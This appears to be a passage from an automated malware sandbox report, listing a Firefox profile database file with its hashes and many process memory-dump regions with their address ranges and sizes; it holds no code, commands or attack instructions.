                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                          Filesize

                                                          10.4MB

                                                          MD5

                                                          e282f7b93a59080708005e0b67b15143

                                                          SHA1

                                                          3e80b77f40e0450c7c72a6375d5f8d88fb0e0212

                                                          SHA256

                                                          64cb746133d8d62fda3a12acadf15fdb4411cced4a62a5de59ed8ca519aa0449

                                                          SHA512

                                                          cdc4167e95d4e14c32e597fa81e741fdd787d4504d2da54415e13528dd48c7c7ba7de5f435c787fd68e4c16c7226224f957e58f0007013457e26369ebd886add

                                                        • memory/348-101-0x0000000076630000-0x0000000076845000-memory.dmp

                                                          Filesize

                                                          2.1MB

                                                        • memory/348-96-0x0000000000400000-0x000000000047F000-memory.dmp

                                                          Filesize

                                                          508KB

                                                        • memory/348-95-0x0000000000400000-0x000000000047F000-memory.dmp

                                                          Filesize

                                                          508KB

                                                        • memory/348-99-0x00007FFDFF270000-0x00007FFDFF465000-memory.dmp

                                                          Filesize

                                                          2.0MB

                                                        • memory/348-97-0x0000000002CA0000-0x00000000030A0000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/348-98-0x0000000002CA0000-0x00000000030A0000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/1000-4518-0x0000000006EC0000-0x0000000006F63000-memory.dmp

                                                          Filesize

                                                          652KB

                                                        • memory/1000-6364-0x00000000072A0000-0x00000000072B4000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/1000-5289-0x00000000071A0000-0x00000000071B1000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/1000-4496-0x0000000073680000-0x00000000736CC000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/1400-63-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-837-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-48-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-108-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-64-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-1512-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-1689-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1400-197-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/1432-169-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-123-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1342-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-124-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-137-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-138-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-143-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-144-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-147-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-164-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1490-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1491-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-168-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-173-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-174-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-648-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1334-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-665-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-666-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1661-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1631-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-697-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-702-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-761-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-760-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1288-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1284-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1238-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-793-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-798-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-834-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/1432-1596-0x0000000000400000-0x0000000000429000-memory.dmp

                                                          Filesize

                                                          164KB

                                                        • memory/2088-34-0x00000000000B0000-0x0000000000556000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/2088-47-0x00000000000B0000-0x0000000000556000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/2472-134-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/2472-136-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/2996-107-0x0000000076630000-0x0000000076845000-memory.dmp

                                                          Filesize

                                                          2.1MB

                                                        • memory/2996-105-0x00007FFDFF270000-0x00007FFDFF465000-memory.dmp

                                                          Filesize

                                                          2.0MB

                                                        • memory/2996-104-0x00000000009F0000-0x0000000000DF0000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/2996-102-0x00000000003F0000-0x00000000003FA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/3152-162-0x0000000000400000-0x0000000000464000-memory.dmp

                                                          Filesize

                                                          400KB

                                                        • memory/3152-163-0x0000000000400000-0x0000000000464000-memory.dmp

                                                          Filesize

                                                          400KB

                                                        • memory/3808-2135-0x0000000007B20000-0x0000000007B34000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/3808-2133-0x0000000007A00000-0x0000000007A11000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/3808-2132-0x00000000076A0000-0x0000000007743000-memory.dmp

                                                          Filesize

                                                          652KB

                                                        • memory/3808-2122-0x0000000073680000-0x00000000736CC000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/4360-1688-0x0000000000FF0000-0x000000000169A000-memory.dmp

                                                          Filesize

                                                          6.7MB

                                                        • memory/4360-1686-0x0000000000FF0000-0x000000000169A000-memory.dmp

                                                          Filesize

                                                          6.7MB

                                                        • memory/4648-2506-0x0000000000400000-0x0000000000CEA000-memory.dmp

                                                          Filesize

                                                          8.9MB

                                                        • memory/4648-2267-0x0000000000400000-0x0000000000CEA000-memory.dmp

                                                          Filesize

                                                          8.9MB

                                                        • memory/4660-80-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-126-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-1660-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-125-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-1033-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-79-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4660-242-0x0000000000400000-0x00000000008B8000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/4692-1144-0x0000000000C20000-0x00000000010BF000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/4692-1390-0x0000000000C20000-0x00000000010BF000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/4820-7665-0x0000026FBDB80000-0x0000026FBDB8A000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/4820-7145-0x0000026FA5370000-0x0000026FA5392000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/4820-7553-0x0000026FBDB90000-0x0000026FBDBAC000-memory.dmp

                                                          Filesize

                                                          112KB

                                                        • memory/4820-7674-0x0000026FBDBB0000-0x0000026FBDBB8000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/4820-7701-0x0000026FBDBC0000-0x0000026FBDBCA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/4936-1692-0x00000000042D0000-0x0000000004334000-memory.dmp

                                                          Filesize

                                                          400KB

                                                        • memory/4936-1691-0x00000000042D0000-0x0000000004334000-memory.dmp

                                                          Filesize

                                                          400KB

                                                        • memory/4936-1690-0x00000000042D0000-0x0000000004334000-memory.dmp

                                                          Filesize

                                                          400KB

                                                        • memory/5024-1528-0x000000000DC10000-0x000000000DC4C000-memory.dmp

                                                          Filesize

                                                          240KB

                                                        • memory/5024-831-0x0000000006640000-0x000000000668C000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/5024-1511-0x000000000D4A0000-0x000000000D4EE000-memory.dmp

                                                          Filesize

                                                          312KB

                                                        • memory/5024-1484-0x000000000C9C0000-0x000000000CB14000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/5024-1485-0x000000000CB40000-0x000000000CB5A000-memory.dmp

                                                          Filesize

                                                          104KB

                                                        • memory/5024-875-0x00000000076F0000-0x0000000007782000-memory.dmp

                                                          Filesize

                                                          584KB

                                                        • memory/5024-814-0x0000000005DA0000-0x00000000060F4000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/5024-1497-0x000000000CE20000-0x000000000CE70000-memory.dmp

                                                          Filesize

                                                          320KB

                                                        • memory/5024-1510-0x000000000D2D0000-0x000000000D492000-memory.dmp

                                                          Filesize

                                                          1.8MB

                                                        • memory/5024-1205-0x0000000007950000-0x0000000007A48000-memory.dmp

                                                          Filesize

                                                          992KB

                                                        • memory/5024-1486-0x000000000CCC0000-0x000000000CCCA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/5024-1145-0x0000000001120000-0x0000000001128000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/5024-1499-0x000000000CF30000-0x000000000CFE2000-memory.dmp

                                                          Filesize

                                                          712KB

                                                        • memory/5024-1527-0x000000000DBB0000-0x000000000DBC2000-memory.dmp

                                                          Filesize

                                                          72KB

                                                        • memory/5380-17-0x0000000005F70000-0x0000000005F8E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                        • memory/5380-19-0x00000000078B0000-0x0000000007F2A000-memory.dmp

                                                          Filesize

                                                          6.5MB

                                                        • memory/5380-20-0x00000000064C0000-0x00000000064DA000-memory.dmp

                                                          Filesize

                                                          104KB

                                                        • memory/5380-22-0x0000000007490000-0x0000000007526000-memory.dmp

                                                          Filesize

                                                          600KB

                                                        • memory/5380-23-0x0000000007430000-0x0000000007452000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/5380-24-0x00000000084E0000-0x0000000008A84000-memory.dmp

                                                          Filesize

                                                          5.6MB

                                                        • memory/5380-18-0x0000000005FC0000-0x000000000600C000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/5380-16-0x0000000005BC0000-0x0000000005F14000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/5380-6-0x0000000005930000-0x0000000005996000-memory.dmp

                                                          Filesize

                                                          408KB

                                                        • memory/5380-5-0x00000000058C0000-0x0000000005926000-memory.dmp

                                                          Filesize

                                                          408KB

                                                        • memory/5380-4-0x00000000050D0000-0x00000000050F2000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/5380-2-0x00000000049E0000-0x0000000004A16000-memory.dmp

                                                          Filesize

                                                          216KB

                                                        • memory/5380-3-0x00000000051E0000-0x0000000005808000-memory.dmp

                                                          Filesize

                                                          6.2MB

                                                        • memory/5916-1380-0x00000000079F0000-0x00000000079F8000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/5916-1372-0x0000000007A00000-0x0000000007A1A000-memory.dmp

                                                          Filesize

                                                          104KB

                                                        • memory/5916-1294-0x0000000073680000-0x00000000736CC000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/5916-1356-0x0000000007990000-0x000000000799E000-memory.dmp

                                                          Filesize

                                                          56KB

                                                        • memory/5916-1364-0x00000000079A0000-0x00000000079B4000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/5916-1325-0x0000000007950000-0x0000000007961000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/5916-1292-0x00000000075D0000-0x0000000007602000-memory.dmp

                                                          Filesize

                                                          200KB

                                                        • memory/5916-1312-0x00000000077B0000-0x00000000077BA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/5916-1307-0x0000000007630000-0x00000000076D3000-memory.dmp

                                                          Filesize

                                                          652KB

                                                        • memory/5916-1304-0x0000000007610000-0x000000000762E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                        • memory/6016-1659-0x00000000005C0000-0x00000000008C8000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                        • memory/6016-1658-0x00000000005C0000-0x00000000008C8000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                        • memory/6136-2165-0x0000000000400000-0x0000000000DF1000-memory.dmp

                                                          Filesize

                                                          9.9MB

                                                        • memory/6136-2178-0x0000000000400000-0x0000000000DF1000-memory.dmp

                                                          Filesize

                                                          9.9MB

                                                        • memory/6164-2202-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/6164-2204-0x0000000000440000-0x00000000008E6000-memory.dmp

                                                          Filesize

                                                          4.6MB

                                                        • memory/6632-2166-0x0000000000340000-0x0000000000776000-memory.dmp

                                                          Filesize

                                                          4.2MB

                                                        • memory/6632-2069-0x0000000000340000-0x0000000000776000-memory.dmp

                                                          Filesize

                                                          4.2MB

                                                        • memory/6632-2072-0x0000000000340000-0x0000000000776000-memory.dmp

                                                          Filesize

                                                          4.2MB

                                                        • memory/6632-2181-0x0000000000340000-0x0000000000776000-memory.dmp

                                                          Filesize

                                                          4.2MB

                                                        • memory/6632-2059-0x0000000000340000-0x0000000000776000-memory.dmp

                                                          Filesize

                                                          4.2MB